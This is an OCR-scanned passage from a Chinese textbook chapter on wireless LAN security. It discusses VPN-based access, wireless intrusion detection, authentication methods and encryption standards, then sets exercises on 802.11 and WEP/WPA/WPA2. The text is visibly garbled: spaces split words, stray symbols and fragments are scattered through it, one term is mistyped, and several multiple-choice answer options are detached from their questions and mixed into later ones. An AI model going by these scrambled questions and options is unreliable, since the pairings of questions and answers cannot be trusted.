对 于 安全 性 要 求 高 的 或 大 型 的 无 线 网 络 ,VPN 方案 是 一 个 更 好 的 选择 。 因 为 在 大 型 无 
线 网 络 中 ,维护 工作 站 和 AP 的 WEP 加 密 密 钥 、AP 的 MAC 地 址 列表 等 都 是 非常 艰巨 的 管 
理 任 务 。 

对 于 无 线 商 用 网 络 , 基 于 VPN 的 解决 方案 是 当今 WEP 机 制 和 MAC 地 址 过 滤 机 制 的 
最 佳 蔡 代 者 。VPN 方案 已 经 广泛 应 用 于 Internet 远程 用 户 的 安全 接 入 。 在 远程 用 户 接 入 
的 应 用 中 ,VPN 在 不 可 信 的 网 络 (internet) 上 提供 一 条 安全 、 专 用 的 通道 或 者 隧道 。 各 种 隧 
道 协议 ,包括 点 对 点 的 隧道 协议 和 第 二 层 隧 道 协议 都 可 以 与 标准 的 、 集 中 的 认证 协议 一 起 使 
用 。 同 样 ,VPN 技术 可 以 应 用 在 无 线 的 安全 接 入 上 ,在 这 个 应 用 中 ,不 可 信和 的 网 络 是 无 线 网 
络 。AP 可 以 被 定义 成 无 WEP 机 制 的 开放 式 接 入 (各 AP 仍 应 定义 成 采用 SSID 机 制 把 无 
线 网 络 分 割 成 多 个 无 线 服 务 子 网 ) ,VPN 服务 器 提供 网 络 的 认证 和 加 密 , 并 充当 局 域 网 网 络 
内 部 。 与 WEP 机 制 和 MAC 地 址 过 滤 接 入 不 同 ,VPN 方案 具有 较 强 的 扩充 、 升 级 性 能 ,可 
应 用 于 大 规模 的 无 线 网 络 。 

5) 无 线 入 侵 检测 系统 

无 线 入 侵 检 测 系 统 同 传统 的 入 侵 检测 系统 类 似 , 但 无 线 入 侵 检 测 系统 增加 了 无 线 局 域 
网 的 检测 和 对 破坏 系统 反应 的 特性 。 如 今 人 侵 检测 系统 已 用 于 在 无 线 局 域 网 中 监视 和 分 析 
用 户 的 活动 ,判断 入 侵 事 件 的 类 型 ,检测 非法 的 网 络 行为 ,对 异常 的 网 络 流量 进行 报警 。 无 
线 入 侵 检测 系统 不 但 能 找 出 入 侵 者 ,还 能 加 强 安全 策略 。 通 过 使 用 强 有 力 的 安全 策略 ,会 使 
无 线 局 域 网 更 安全 。 

6) 采用 身份 验证 和 授权 

当 攻 击 者 了 解 网 络 的 SSID、 网 络 的 MAC 地 址 或 甚至 WEP 密 钥 等 信息 时 ,他 们 可 能 尝 
试 建立 与 AP 的 关联 。 目 前 ,可 以 使 用 3 种 方法 在 用 户 建立 与 无 线 网 络 的 关联 前 对 他 们 进 
行 身份 验证 。Q@ 开 放 身 份 验证 通常 意味 着 只 需要 向 AP 提供 SSID 或 正确 的 WEP 密 钥 。 
开放 身份 验证 的 问题 在 于 ,如 果 没 有 其 他 的 保护 或 身份 验证 机 制 , 那 么 无 线 网 络 将 是 完全 开 
放 的 ,就 像 其 名 称 所 表示 的 。 回 共享 密 钥 身份 验证 机 制 类 似 于 “口令 一 响应 ”身份 验证 系统 。 
在 STA( 工 作 站 ) 与 AP 共享 同一 个 WEP 密 钥 时 使 用 这 一 机 制 。STA 向 AP 发 送 申请 , 然 
后 AP 发 回 口 令 。 接 着 ,STA 利用 口令 和 加 密 的 响应 进行 回复 。 这 种 方法 的 漏洞 在 于 口令 
是 通过 明文 传输 给 STA 的 ,因此 如 果 有 人 能 够 同时 截取 口令 和 响应 ,那么 他 们 就 可 能 找到 
用 于 加 密 的 密 钥 。@@ 还 可 采用 其 他 的 身份 验证 /授权 机 制 (如 使 用 802. 1x、VPN 或 数字 证 
书 ) 对 无 线 网 络 用 户 进行 身份 验证 和 授权 。 使 用 客户 端 数字 证 书 可 以 使 攻击 者 几乎 无 法 获 
得 访问 权限 。 
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7) 其 他 安全 措施 


除了 上 述 的 安全 措施 之 外 ,还 可 以 采取 其 他 安全 技术 。 例 如 ,设置 第 三 方 数据 加 密 方 
案 , 即 使 信号 被 非法 用 户 窃听 ,他 们 也 难以 理解 其 中 的 内 容 ;可 以 通过 加 强 企业 内 部 管理 等 
方法 来 加 强 WLAN 的 安全 性 。 
无 线 网 络 应 用 越 来 越 广泛 ,但 是 随 之 而 来 的 网 络 安 全 问题 也 越 来 越 突出 。 以 上 分 析 了 
WLAN 的 不 安全 因素 ,针对 不 安全 因素 给 出 了 可 采取 的 安全 措施 ,有 效 地 防范 窃听 截取 或 
者 修改 传输 数据 、 置 信 攻 击 、 拒 绝 服务 等 的 攻击 ,但 是 由 于 现在 各 个 无 线 网 络 设备 生产 厂商 
生产 的 设备 的 功能 不 一 样 ,所 以 上 面 介绍 的 一 些 安全 措施 也 许 在 不 同 的 设备 上 会 不 一 样 。 
采用 以 上 安全 措施 ,能 够 保证 无 线 网 络 内 的 用 户 的 信息 和 传输 消息 的 安全 性 和 保密 性 ,有 效 
地 维护 无 线 局 域 网 的 安全 。 


习 


一 、 选 择 题 

1. IEEE 802. 11 标准 定义 了 ( Ns 
A. 无 线 局 域 网 技术 规范 
C. 光纤 局 域 网 技术 规范 


题 


B. 电缆 调制 解 调 器 技术 规范 
D. 宽带 网 络 技术 规范 


2. 802. 11b 定义 了 使 用 跳 频 扩 频 技术 的 无 线 局 域 网 标准 ,传输 速率 为 1Mbps、2Mbps、 
5.5Mbps 与 ( Ws 


A. 10Mbps B. 11Mbps 


3. IEEE 802. 11 使 用 的 传输 技术 为 ( Ws 


A. 红外 、 跳 频 扩 频 与 蓝牙 
C. 红外 、 直 接 序 列 扩 频 与 蓝牙 
4. 无 线 网 络 接 入 点 称 为 ( )。 
A. 无 线 AP B. 无 线路 由 器 
5. 关于 Ad-Hoc 网 络 的 描述 中 ,错误 的 是 ( 
A. 没有 固定 的 路 由 器 
C. 具有 动态 搜索 能 力 
6. 关于 Ad-Hoc 网 络 的 描述 中 ,错误 的 是 ( 
A. 是 一 种 对 等 的 无 线 移动 网 络 
C. 采用 无 基站 的 通信 模式 


C. 20Mbps D. 54Mbps 
B. 跳 频 扩 频 、 直 接 序 列 扩 频 与 蓝牙 
D. 红外 、 跳 频 扩 频 与 直接 序列 扩 频 


C. 无 线 网 卡 
ye 
B. 需要 基站 
D. 适用 于 紧急 救援 等 场合 
hs 
B. 在 WLAN 的 基础 上 发 展 起 来 
D. 在 军事 领域 应 用 广泛 


D. WEP 


7. IEEE 802. 11 技术 和 蓝牙 技术 可 以 共同 使 用 的 无 线 信道 频 点 是 ( ) 。 


A. 800MHz B. 2. 4GHz 


8. 关于 无 线 局 域 网 的 描述 中 ,错误 的 是 ( 


A. 采用 无 线 电波 作为 传输 介质 
C. 可 以 支持 10Gbps 的 传输 速率 


9. 无 线 局 域 网 中 使 用 的 SSID 是 ( Ns 


A. 无 线 局 域 网 的 设备 名 称 


. 5GHz D. 10GHz 


让 
B. 可 以 作为 传统 局 域 网 的 补充 
D. 协议 标准 是 IEEE 802. 11 


B. 无 线 局 域 网 的 标识 符号 
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C. 无 线 局 域 网 的 入 网 口令 D. 无 线 局 域 网 的 加 密 符 号 
10. 以 下 ( ) 不 属于 无 线 加 密 标 准 。 
A. DES B. WEP C. WPA D. WPA2 
二 、 填空 题 
1. 在 WLAN 无 线 局 域 网 中 ， 是 最 早 发 布 的 基本 标准 ， 和 标 
准 的 传输 速率 都 达到 了 54Mbps， 和 标准 是 工作 在 免费 频段 上 的 。 
2. 在 无 线 网 络 中 ,除了 WLAN 外 ,其 他 的 还 有 和 等 几 种 无 线 网 络 
技术 。 
3. 无 线 网 络 设备 主要 有 i 和 等 。 
4. IEEE 802. 11x 系列 标准 主要 有 
和 6 种。 
5. 无 线 加 密 标 准 主要 有 和 3 种。 
三 、 简 答题 
1. 无 线 局 域 网 的 物理 层 有 哪些 标准 ? 
2. 常用 的 无 线 局 域 网 设备 有 哪些 ?它们 各 自 的 功能 是 什么 ? 
3. 无 线 局 域 网 的 网 络 结构 有 哪 几 种 ? 它们 有 何 区 别 ? 
4. 无 线 加 密 标 准 WEP、WPA、WPA2 有 何 区 别 ? 哪个 安全 性 最 高 ? 
四 、 操 作 练 习题 
分 别 用 WEP、WPA、WPA2 加 密 标 准 设置 无 线 网 卡 和 无 线路 由 器 ,并 测试 其 连通 性 。 
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